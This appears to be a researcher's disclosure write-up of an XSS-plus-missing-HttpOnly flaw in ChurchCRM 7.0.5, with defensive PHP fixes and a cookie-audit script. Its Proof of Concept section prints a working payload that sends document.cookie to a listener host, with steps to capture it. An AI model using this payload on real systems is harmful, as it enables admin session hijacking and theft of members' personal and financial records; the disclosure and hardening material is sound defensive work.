CVE-2026-39338: Blind XSS to Full Admin Takeover in ChurchCRM


How a single unsanitized search parameter in ChurchCRM v7.0.5 led to complete administrator session hijacking — and why a missing HttpOnly flag turned a contained bug into total compromise.

Published on April 07, 2026 by Steven Amador

CVE XSS web-app-security


Summary

While doing independent research on ChurchCRM, an open-source church management platform, I found a Blind Cross-Site Scripting (XSS) vulnerability in the dashboard’s global search feature. On its own, that would have been a moderate finding. What made it serious was a second, unrelated misconfiguration: the application’s session cookie was missing the HttpOnly flag. Put those two issues together, and an attacker could fully hijack an Administrator’s session with nothing more than a crafted link.

This became CVE-2026-39338, affecting ChurchCRM versions ≤ 7.0.5, patched in 7.1.0. CVSS v4.0 score: 8.3 (High).

Where was it in the code?

The vulnerable parameter was searchTerm, accepted by the dashboard’s global search bar at: http://[TARGET]/churchcrm/v2/dashboard

The application reflected this input back into the page without applying any output encoding (such as PHP's htmlspecialchars()). This is CWE-79, improper neutralization of input during web page generation.

The application also returned an HTTP 500 error, which I suspect was caused by the malformed input breaking a downstream API call.

HttpOnly flag

Because the session cookie was set without the HttpOnly flag (CWE-1004), it could be read directly via document.cookie and sent via fetch to my listener.
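The two halves of the chain, unencoded reflection and a cookie readable from script, are each a one-line fix on the server side. The following is an added example written for this post, not ChurchCRM's own code: the handler functions and the e() helper are hypothetical stand-ins for whatever renders the dashboard search heading, shown in the vulnerable form and the hardened form, together with the session cookie parameters that set HttpOnly.

```php
<?php
// Added example, not ChurchCRM's code. A hypothetical handler that reflects a
// search term into an HTML page, shown vulnerable and then hardened.

// Vulnerable: the raw parameter is concatenated into HTML, so a value
// containing markup is rendered and executed (CWE-79).
function renderSearchHeadingVulnerable(string $searchTerm): string
{
    return "<h2>Results for: " . $searchTerm . "</h2>";
}

// Hardened: every reflected value goes through htmlspecialchars() with
// ENT_QUOTES so that single and double quotes are encoded as well (needed if
// the value ever lands inside an attribute) and an explicit charset.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderSearchHeadingHardened(string $searchTerm): string
{
    return "<h2>Results for: " . e($searchTerm) . "</h2>";
}

// Hardened session cookie (CWE-1004): HttpOnly keeps document.cookie from
// exposing the session id; Secure and SameSite are the companion settings.
// Must be called before session_start(); the array form needs PHP >= 7.3.
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',        // current host only
        'secure'   => true,      // never sent over plain HTTP
        'httponly' => true,      // not readable from JavaScript
        'samesite' => 'Strict',
    ]);
    // Equivalent php.ini settings: session.cookie_httponly=1,
    // session.cookie_secure=1, session.cookie_samesite=Strict
}

// Constructed input for the demonstration: a benign tag with an event handler,
// not the payload from the advisory.
$input = '<b onmouseover="x()">term</b>';
echo renderSearchHeadingVulnerable($input), PHP_EOL;
echo renderSearchHeadingHardened($input), PHP_EOL;
```

Run under the PHP CLI, the first line prints the tag intact (a browser would execute the handler), while the second prints the angle brackets and quotes as HTML entities so the term is displayed as text. Even with the encoding fix in place, configureSessionCookie() is what keeps a future injection from reaching the session id.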

Proof of Concept

Payload:

<script>fetch('http://192.168.112.128:8080/log?c='+document.cookie)</script>

Steps to reproduce:

  1. Stand up a listener on the attacker machine: python3 -m http.server 8080

  2. Enter the payload shown above into the dashboard search bar and submit the search.

  3. Watch the listener's output in the terminal: the session cookie arrives in plain text.
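Step 3 works only because the cookie lacks HttpOnly, and that half of the chain can be verified passively from response headers without injecting anything. Below is an added defender-side check, not code from the advisory or from ChurchCRM: it parses Set-Cookie lines from raw response headers (as captured by curl -I or a browser's network panel) and reports which protective attributes are absent. The sample responses are constructed for the example.

```php
<?php
// Added example, not ChurchCRM's code: audit Set-Cookie headers for the
// attributes that would have contained this chain.

/**
 * Parse one Set-Cookie header value and report the protective attributes
 * that are absent. Returns ['name' => cookie name, 'missing' => [...]].
 */
function auditSetCookie(string $headerValue): array
{
    $parts = array_map('trim', explode(';', $headerValue));
    $nameValue = array_shift($parts);
    $name = explode('=', $nameValue, 2)[0];

    $attrs = [];
    foreach ($parts as $attr) {
        // Attribute names are case-insensitive; some (SameSite=Lax) carry a value.
        [$key, $val] = array_pad(explode('=', $attr, 2), 2, null);
        $attrs[strtolower($key)] = $val === null ? true : $val;
    }

    $missing = [];
    if (!isset($attrs['httponly'])) {
        $missing[] = 'HttpOnly';   // readable from document.cookie
    }
    if (!isset($attrs['secure'])) {
        $missing[] = 'Secure';     // sent over plain HTTP
    }
    // SameSite=None is treated as missing: it offers no cross-site restriction.
    if (!isset($attrs['samesite']) || strtolower((string) $attrs['samesite']) === 'none') {
        $missing[] = 'SameSite';
    }
    return ['name' => $name, 'missing' => $missing];
}

/** Pull every Set-Cookie line out of a raw response header block and audit it. */
function auditResponseHeaders(string $rawHeaders): array
{
    $results = [];
    foreach (preg_split("/\r?\n/", $rawHeaders) as $line) {
        if (stripos($line, 'Set-Cookie:') === 0) {
            $results[] = auditSetCookie(trim(substr($line, strlen('Set-Cookie:'))));
        }
    }
    return $results;
}

// Constructed sample responses (not captured from a real ChurchCRM instance).
$samples = [
    'weak'  => "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=abc123; path=/\r\nContent-Type: text/html\r\n",
    'fixed' => "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=abc123; path=/; Secure; HttpOnly; SameSite=Strict\r\n",
];

foreach ($samples as $label => $raw) {
    foreach (auditResponseHeaders($raw) as $r) {
        $status = $r['missing'] ? 'MISSING ' . implode(', ', $r['missing']) : 'ok';
        printf("%-5s %-10s %s%s", $label, $r['name'], $status, PHP_EOL);
    }
}
```

The 'weak' sample reproduces the shape of the finding (a session cookie with only a path attribute) and is flagged for all three attributes; the 'fixed' sample passes. Running the same function over the headers of every authenticated page in a deployment is a quick regression check after upgrading to 7.1.0.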

Impact

With a hijacked admin session, an attacker could potentially:

  • Export the full membership database — names, addresses, contact info, family records.
  • View, modify, or delete financial and donation records.
  • Create new admin accounts for persistent access, surviving the original session’s expiration.
  • Pivot further if the CRM instance shares infrastructure with other services.

Disclosure Timeline

  • March 27–28, 2026 — Vulnerability identified during independent research.
  • Reported privately to the ChurchCRM maintainers through GitHub’s security advisory process.
  • April 7, 2026 — Advisory published, CVE-2026-39338 assigned, fix released in v7.1.0.

I followed a standard responsible disclosure approach throughout — no public details, no weaponization, full coordination with the maintainers before publicly disclosing.

Takeaways

Two small issues — missing output encoding and a missing cookie flag — combined into a full compromise chain. Neither one alone would have been nearly as severe. It’s a good reminder that defense-in-depth should be top of mind: HttpOnly exists specifically to contain damage when an XSS is possible.

Full technical advisory: GHSA-3ghg-qfqw-rcqf

Official CVE record: CVE-2026-39338